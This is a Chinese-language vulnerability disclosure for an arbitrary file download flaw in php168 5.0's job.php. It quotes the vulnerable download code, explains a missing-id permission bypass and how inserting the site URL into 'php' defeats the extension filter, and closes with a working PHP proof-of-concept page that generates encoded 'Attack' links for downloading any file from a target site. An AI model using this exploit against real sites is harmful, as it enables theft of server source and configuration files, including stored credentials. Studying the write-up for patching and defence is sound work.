php168 5.0 job.php 信息泄漏漏洞

### 漏洞分析 看job.php 92行 ``` elseif($job=="download") { $rsdb=$db->get_one("SELECT * FROM {$pre}article WHERE aid='$id'"); $fidDB=$db->get_one("SELECT * FROM {$pre}sort WHERE fid='$rsdb[fid]'"); if($fidDB[admin]&&$lfjid){ $detail=explode(",",$fidDB[admin]); if( in_array($lfjid,$detail) ){ $web_admin=1; } } if($fidDB[allowdownload]&&!$web_admin&&$lfjuid!==$rsdb[uid]){ $detail=explode(",",$fidDB[allowdownload]); if( !in_array($groupdb['gid'],$detail) ){ showerr("你所在的用户组无权限下载"); } } if($rsdb[allowdown]&&!$web_admin&&$lfjuid!==$rsdb[uid]){ $detail=explode(",",$rsdb[allowdown]); if( !in_array($groupdb['gid'],$detail) ){ showerr("你所在的用户组无权限下载"); } } $url=base64_decode($url); if( eregi(".php",$url) ){ die("ERR"); } $fileurl=str_replace($webdb[www_url],"",$url); if(is_file(PHP168_PATH."$fileurl")&&filesize(PHP168_PATH."$fileurl")<1024*1024*500){ $filename=basename($fileurl); $filetype=substr(strrchr($filename,'.'),1); $_filename=preg_replace("/([\d]+)_(200[\d]+)_([^_]+)\.([^\.]+)/is","\\3",$filename); if(eregi("^([a-z0-9=]+)$",$_filename)&&!eregi("(jpg|gif|png)$",$filename)){ $filename=urldecode(base64_decode($_filename)).".$filetype"; } ob_end_clean(); header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT'); header('Pragma: no-cache'); header('Content-Encoding: none'); header('Content-Disposition: attachment; filename='.$filename); header('Content-type: '.$filetype); header('Content-Length: '.filesize(PHP168_PATH."$fileurl")); readfile(PHP168_PATH."$fileurl"); }else{ $fileurl=strstr($url,"://")?$url:tempdir($fileurl); header("location:$fileurl"); } exit; } ``` 一开始是权限判断，可以发现若不传值id，那么两个判断都是为空的，从而可以越权访问。 然后看到116行 $url=base64_decode($url); if( eregi(".php",$url) ){ die("ERR"); } $fileurl=str_replace($webdb[www_url],"",$url); ``` 若匹配到了php会报错 但下面紧跟着一句代码，会将当前网站的网址替换成空 这样我们就能在php中间加上当前网站的网址，从而绕过过滤，达到下载任意文件的目的 比如 http://test/index.phttp://test.cnhp就可以绕过了 ``` ### POC ``` <html> <body> <form method="get"> URL: <input type="text" name="url"><br> DIR: <input type="text" name="dir"><br> <input type="submit" value="Submit"><br> <?php $url = $_GET[url]; $dir = (strlen($_GET[dir])>0)?$_GET[dir]:"/index.php"; if($url[strlen($url)-1]=='/') $url = substr($url,0,strlen($url)-1);//如果URL的最后一位是/ 则去掉 if ($dir[0]!='/') $dir = '/'.$dir;//如果第一位不是/则加上 echo "AIM : ".$url."<br/>"; echo "DIR : ".$dir."<br/><br/>"; $t = 0; $B64 = $url.$dir; while ($r = strpos($B64,"php",$t)){ $B64 = substr($B64,0,$r+1).$url.substr($B64,$r+1); $t = $r + 1; } $B64 = base64_encode($B64); $U = $url."/job.php?job=download&url=".$B64; echo "<a href=".$U.">Attack</a>" ?> </body> </html> ```